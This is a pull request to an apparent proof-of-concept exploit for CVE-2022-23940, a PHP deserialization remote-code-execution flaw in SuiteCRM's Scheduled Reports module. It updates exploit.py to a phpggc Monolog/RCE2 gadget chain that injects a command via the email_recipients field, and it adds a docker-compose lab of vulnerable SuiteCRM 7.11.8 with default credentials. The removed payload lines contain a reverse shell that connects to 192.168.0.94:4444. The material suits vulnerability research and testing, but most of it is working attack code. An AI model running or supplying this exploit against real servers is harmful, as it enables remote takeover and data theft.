### PR TITLE
Suite-CRM 7.11.8 PoC

### DIFF
--- a/README.md
+++ b/README.md
@@ -44,7 +44,7 @@ Options:
 
 Users who are able to create **Scheduled Reports** (can create entries in the `AOR_Scheduled_Reports` module) can execute arbitrary code on the server by abusing a PHP deserialization vulnerability.
 
-The `AOR_Scheduled_Reports` module stores the email recipients of the report as serialized, base64 encoded strings in the database. When receiving the data for a scheduled report, the mentioned column gets deserialized. If attackers are able to insert arbitrary content into this column, they can achieve RCE through various PHP deserialization gadgets (in my tests I used the `Monolog/RCE1` from the [phpggc](https://github.com/ambionics/phpggc) tool).
+The `AOR_Scheduled_Reports` module stores the email recipients of the report as serialized, base64 encoded strings in the database. When receiving the data for a scheduled report, the mentioned column gets deserialized. If attackers are able to insert arbitrary content into this column, they can achieve RCE through various PHP deserialization gadgets (in my tests I used the `Monolog/RCE2` from the [phpggc](https://github.com/ambionics/phpggc) tool).
 
 The payload can be stored in the database using the legacy save call of the `AOR_Scheduled_Reports` module. The server incorrectly assumes that the `email_recipients` parameter is always an array. However, if a malicous client just passes the `email_recipients` as a string, the data will be stored in the database as it is. Once deserialized, the gadgets are executed on the server and we obtain remote code execution.
 

--- a/exploit.py
+++ b/exploit.py
@@ -6,9 +6,10 @@ import logging
 import requests
 from base64 import b64encode
 
-# Credits to https://github.com/ambionics/phpggc (Monolog/RCE1 payload)
-payload_template_start = b'a:2:{i:7;O:32:"Monolog\\Handler\\SyslogUdpHandler":1:{s:9:"\x00*\x00socket";O:29:"Monolog\\Handler\\BufferHandler":7:{s:10:"\x00*\x00handler";O:29:"Monolog\\Handler\\BufferHandler":7:{s:10:"\x00*\x00handler";N;s:13:"\x00*\x00bufferSize";i:-1;s:9:"\x00*\x00buffer";a:1:{i:0;a:2:{i:0;'
-payload_template_end = b';s:5:"level";N;}}s:8:"\x00*\x00level";N;s:14:"\x00*\x00initialized";b:1;s:14:"\x00*\x00bufferLimit";i:-1;s:13:"\x00*\x00processors";a:2:{i:0;s:7:"current";i:1;s:6:"system";}}s:13:"\x00*\x00bufferSize";i:-1;s:9:"\x00*\x00buffer";a:1:{i:0;a:2:{i:0;s:78:"php -r \'$sock=fsockopen("192.168.0.94",4444);exec("/bin/sh -i <&3 >&3 2>&3");\'";s:5:"level";N;}}s:8:"\x00*\x00level";N;s:14:"\x00*\x00initialized";b:1;s:14:"\x00*\x00bufferLimit";i:-1;s:13:"\x00*\x00processors";a:2:{i:0;s:7:"current";i:1;s:6:"system";}}}i:7;i:7;}'
+# Credits to https://github.com/ambionics/phpggc (Monolog/RCE2 payload)
+payload_template_start = b'a:2:{i:7;O:32:"Monolog\\Handler\\SyslogUdpHandler":1:{s:6:"socket";O:29:"Monolog\\Handler\\BufferHandler":7:{s:10:"\x00*\x00handler";O:29:"Monolog\\Handler\\BufferHandler":7:{s:10:"\x00*\x00handler";N;s:13:"\x00*\x00bufferSize";i:-1;s:9:"\x00*\x00buffer";a:1:{i:0;a:2:{i:0;'
+payload_template_second = b';s:5:"level";N;}}s:8:"\x00*\x00level";N;s:14:"\x00*\x00initialized";b:1;s:14:"\x00*\x00bufferLimit";i:-1;s:13:"\x00*\x00processors";a:2:{i:0;s:7:"current";i:1;s:6:"system";}}s:13:"\x00*\x00bufferSize";i:-1;s:9:"\x00*\x00buffer";a:1:{i:0;a:2:{i:0;'
+payload_template_third = b';s:5:"level";N;}}s:8:"\x00*\x00level";N;s:14:"\x00*\x00initialized";b:1;s:14:"\x00*\x00bufferLimit";i:-1;s:13:"\x00*\x00processors";a:2:{i:0;s:7:"current";i:1;s:6:"system";}}}i:7;i:7;}'
 
 logging.basicConfig(level=logging.INFO)
 logger = logging.getLogger("CVE-2022-23940")
@@ -55,8 +56,9 @@ def main(host: str, username: str, password: str, payload: str, is_core: bool):
 
     logger.info(f"Login did work - Trying to create scheduled report")
 
-    payload = payload_template_start + f"s:{len(payload)}:\"{payload}\"".encode(
-    ) + payload_template_end
+    command_payload = f"s:{len(payload)}:\"{payload}\"".encode()
+
+    payload = payload_template_start + command_payload + payload_template_second + command_payload + payload_template_third
     payload = b64encode(payload)
 
     response = session.post(f'{host}/index.php',

--- a/vulnerable/README.md
+++ b/vulnerable/README.md
@@ -1,0 +1,6 @@
+# Vulnerable SCRM Instance
+
+Running on Port 80 / 443
+
+Username: `user`
+Password: `bitnami`

--- a/vulnerable/docker-compose.yml
+++ b/vulnerable/docker-compose.yml
@@ -1,0 +1,32 @@
+version: "2"
+services:
+  mariadb:
+    image: docker.io/bitnami/mariadb:10.3
+    environment:
+      # ALLOW_EMPTY_PASSWORD is recommended only for development.
+      - ALLOW_EMPTY_PASSWORD=yes
+      - MARIADB_USER=bn_suitecrm
+      - MARIADB_DATABASE=bitnami_suitecrm
+    volumes:
+      - "mariadb_data:/bitnami/mariadb"
+  suitecrm:
+    image: docker.io/bitnami/suitecrm:7.11.8-ol-7-r85
+    ports:
+      - "80:8080"
+      - "443:8443"
+    environment:
+      - SUITECRM_DATABASE_HOST=mariadb
+      - SUITECRM_DATABASE_PORT_NUMBER=3306
+      - SUITECRM_DATABASE_USER=bn_suitecrm
+      - SUITECRM_DATABASE_NAME=bitnami_suitecrm
+      # ALLOW_EMPTY_PASSWORD is recommended only for development.
+      - ALLOW_EMPTY_PASSWORD=yes
+    volumes:
+      - "suitecrm_data:/bitnami/suitecrm"
+    depends_on:
+      - mariadb
+volumes:
+  mariadb_data:
+    driver: local
+  suitecrm_data:
+    driver: local


### PR DESCRIPTION
This PR changes the payload to `Monolog/RCE2` (see https://github.com/ambionics/phpggc), since older versions of SuiteCRM don't support the original payload. 

In addition, I added a `docker-compose` setup to test this script against vulnerable instances of the [bitnami/suitecrm](https://hub.docker.com/r/bitnami/suitecrm) image. 

Since the `Monolog/RCE2` payload also works on newer installation, it should be safe to merge this. 